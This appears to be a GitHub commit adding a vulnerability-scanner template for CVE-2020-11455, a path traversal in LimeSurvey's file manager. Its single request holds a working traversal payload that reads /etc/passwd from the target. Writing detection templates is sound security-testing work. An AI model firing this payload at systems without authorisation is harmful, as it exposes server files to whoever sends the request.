Create CVE-2020-11455.yaml

patch-1
Muhammad Daffa 2021-07-29 05:43:07 +07:00 committed by GitHub
parent 60be63be57
commit da3ba72db3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: CVE-2020-11455
info:
name: LimeSurvey 4.1.11 - Path Traversal
author: daffainfo
severity: high
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
reference: |
- https://www.exploit-db.com/exploits/48297
- https://www.cvedetails.com/cve/CVE-2020-11455
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200